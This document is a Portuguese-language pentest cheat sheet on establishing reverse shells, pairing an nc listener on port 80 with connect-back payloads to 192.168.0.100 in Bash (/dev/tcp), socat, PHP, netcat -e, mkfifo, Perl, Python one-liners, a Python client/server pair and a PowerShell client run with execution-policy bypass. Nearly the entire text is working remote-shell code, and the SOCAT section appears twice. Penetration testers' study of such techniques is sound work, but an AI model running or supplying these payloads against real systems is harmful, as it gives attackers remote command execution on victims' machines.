Reverse Shell

Neste artigo apresento algumas opções que podem ser úteis durante a realização de um PenTest para que você possa estabelecer uma conexão reversa (reverse shell) com servidores e computadores de usuários.

Cenário

EXEC

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

exec 5<>/dev/tcp/192.168.0.100/80
cat <&5 | while read line; do $line 2>&5 >&5; done

03 - Passo

Execute os comandos :

Linux

hostname

ls -l

BASH

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

bash -i >& /dev/tcp/192.168.0.100/80 0>&1

03 - Passo

Execute o comando :

Linux

hostname

SOCAT

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

socat tcp:192.168.0.100:80 exec:'bash -i',pty,stderr,setsid,sigint,sane

03 - Passo

Execute os comandos :

Linux

hostname

SOCAT

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

socat tcp:192.168.0.100:80 exec:'bash -i',pty,stderr,setsid,sigint,sane

03 - Passo

Execute o comando :

Linux

hostname

PHP

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

php -r '$sock=fsockopen("192.168.0.100",80);exec("/bin/bash -i <&3 >&3 2>&3");'

03 - Passo

Conexão estabelecida!

NC (Net Cat)

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

nc -e /bin/bash 192.168.0.100 80

03 - Passo

Execute o comando :

Linux

hostname

MKFIFO

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

mkfifo /tmp/remoto;nc 192.168.0.100 80 0< /tmp/remoto | /bin/bash -i 2>&1 | tee /tmp/remoto

03 - Passo

Conexão estabelecida!

PERL

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

perl -e 'use Socket;$i="192.168.0.100";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

03 - Passo

Conexão estabelecida!

PYTHON - Opção 01

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Execute :

Linux

python3 -c 'import pty;import socket,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",80));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

03 - Passo

Conexão estabelecida!

PYTHON - Opção 02

01 - Passo

Execute o script server.py.

Linux

import socket
SERVER_HOST = "0.0.0.0"
SERVER_PORT = 80
# send 1024 (1kb) a time (as buffer size)
BUFFER_SIZE = 1024
# create a socket object
s = socket.socket()


# bind the socket to all IP addresses of this host
s.bind((SERVER_HOST, SERVER_PORT))

s.listen(5)
print(f"Listening as {SERVER_HOST}:{SERVER_PORT} ...")

# accept any connections attempted
client_socket, client_address = s.accept()
print(f"{client_address[0]}:{client_address[1]} Conectado!")

# just sending a message, for demonstration purposes
message = "Conexao estabelecida com sucesso!".encode()
client_socket.send(message)

while True:
    # get the command from prompt
    command = input("Digite um comando: ")
    # send the command to the client
    client_socket.send(command.encode())
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    # retrieve command results
    results = client_socket.recv(BUFFER_SIZE).decode()
    # print them
    print(results)
# close connection to the client
client_socket.close()
# close server connection
s.close()

02 - Passo

Execute o script client.py.

Linux

import socket
import subprocess

SERVER_HOST = "192.168.0.100"
SERVER_PORT = 80
BUFFER_SIZE = 1024

# create the socket object
s = socket.socket()
# connect to the server
s.connect((SERVER_HOST, SERVER_PORT))

# receive the greeting message
message = s.recv(BUFFER_SIZE).decode()
print("Server:", message)

while True:
    # receive the command from the server
    command = s.recv(BUFFER_SIZE).decode()
    if command.lower() == "exit":
        # if the command is exit, just break out of the loop
        break
    # execute the command and retrieve the results
    output = subprocess.getoutput(command)
    # send the results back to the server
    s.send(output.encode())
# close client connection
s.close()

03 - Passo

Execute o comando :

Linux

hostname

POWER SHELL

01 - Passo

Inicie o nc (Net Cat) na porta 80.

Linux

nc -nlvp 80

02 - Passo

Script client.ps1.

Windows

$socket = new-object System.Net.Sockets.TcpClient('192.168.0.100', 80);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do{
	$writer.Write("> ");
	$writer.Flush();
	$read = $null;
	while($stream.DataAvailable -or ($read = $stream.Read($buffer, 0, 1024)) -eq $null){}	
	$out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
	if(!$out.equals("exit")){
		$out = $out.split(' ')
	        $res = [string](&$out[0] $out[1..$out.length]);
		if($res -ne $null){ $writer.WriteLine($res)}
	}
}While (!$out.equals("exit"))
$writer.close();$socket.close();

Execute o script client.ps1.

powershell -ExecutionPolicy Bypass -File .\client.ps1

03 - Passo

Execute os comandos :

Linux

hostname

dir